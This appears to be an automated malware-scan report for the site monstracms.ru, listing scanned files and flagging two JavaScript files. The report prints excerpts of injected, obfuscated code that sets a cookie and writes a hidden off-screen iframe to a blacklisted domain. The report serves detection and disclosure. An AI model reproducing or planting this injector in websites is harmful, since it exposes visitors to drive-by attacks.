Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=monstracms.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://monstracms.ru/ | 200 OK Content-Length: 10947 Content-Type: text/html | clean |
http://monstracms.ru/public/themes/monstracms/js/jquery-2.0.2.min.js | 200 OK Content-Length: 83501 Content-Type: application/javascript | clean |
http://monstracms.ru/swfobject.js | 200 OK Content-Length: 8938 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: dsdsbran.anthyia.es ...[1217 bytes skipped]... var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!nnn_action()) { var cookie = getCookie('brond36fer19jan46jol12m'); if (cookie == undefined) { setCookie('brond36fer19jan46jol12m', true, 86400); document.write('<'+'i'+'fr'+'a'+'me'+' sr'+'c'+'='+'"http://dsdsbran.anthyia.es/jtrshgfkyg5.html" style="position:absolute;left:'+'-'+'1500'+'p'+'x;top:'+'-'+'1500'+'px;" height="200" width="200"></iframe>'); } } })(); if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DET ...[6478 bytes skipped]... Decoded script: <iframe src="http://dsdsbran.anthyia.es/jtrshgfkyg5.html" style="position:absolute;left:-1500px;top:-1500px;" height="200" width="200"></iframe> | ||
http://monstracms.ru/public/themes/monstracms/js/share/share.js | 200 OK Content-Length: 5358 Content-Type: application/javascript | clean |
http://monstracms.ru/tmp/minify/frontend_site.minify.js | 200 OK Content-Length: 154589 Content-Type: application/javascript | clean |
http://monstracms.ru/public/themes/monstracms/js/modal.js | 200 OK Content-Length: 3848 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: dsdsbran.anthyia.es ...[1217 bytes skipped]... var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!nnn_action()) { var cookie = getCookie('brond36fer19jan46jol12m'); if (cookie == undefined) { setCookie('brond36fer19jan46jol12m', true, 86400); document.write('<'+'i'+'fr'+'a'+'me'+' sr'+'c'+'='+'"http://dsdsbran.anthyia.es/jtrshgfkyg5.html" style="position:absolute;left:'+'-'+'1500'+'p'+'x;top:'+'-'+'1500'+'px;" height="200" width="200"></iframe>'); } } })(); $(function() { $.fn.extend({ center: function () { return this.each(function() { var $this = $(this); var $window = $(window); clearTimeout($this.timerHandle); var top = ($window.height() - $this.height())/2+$window.scrollTop(); var left = ($window.width() - $ ...[1446 bytes skipped]... Decoded script: <iframe src="http://dsdsbran.anthyia.es/jtrshgfkyg5.html" style="position:absolute;left:-1500px;top:-1500px;" height="200" width="200"></iframe> | ||
http://monstracms.ru/home | 200 OK Content-Length: 10951 Content-Type: text/html | clean |
http://monstracms.ru/uroki | 200 OK Content-Length: 9940 Content-Type: text/html | clean |
http://monstracms.ru/p | 200 OK Content-Length: 13681 Content-Type: text/html | clean |
http://monstracms.ru/templates | 200 OK Content-Length: 8974 Content-Type: text/html | clean |
http://monstracms.ru/users/login | 200 OK Content-Length: 9909 Content-Type: text/html | clean |
http://monstracms.ru/users/registration | 200 OK Content-Length: 10555 Content-Type: text/html | clean |
http://monstracms.ru/images/files/monstra-2.3.1.zip | 200 OK Content-Length: 300970 Content-Type: application/zip | clean |
http://monstracms.ru/test404page.js | 404 Not Found Content-Length: 9463 Content-Type: text/html | clean |
http://monstracms.ru/sitemap | 200 OK Content-Length: 10207 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: monstracms.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 23 May 2014 04:48:36 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=a751c54367ceccb4663e15328517e83d; path=/
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: monstracms.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 23 May 2014 04:48:36 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=a751c54367ceccb4663e15328517e83d; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: monstracms.ru
Referer: http://www.google.com/search?q=monstracms.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: monstracms.ru
Referer: http://www.google.com/search?q=monstracms.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.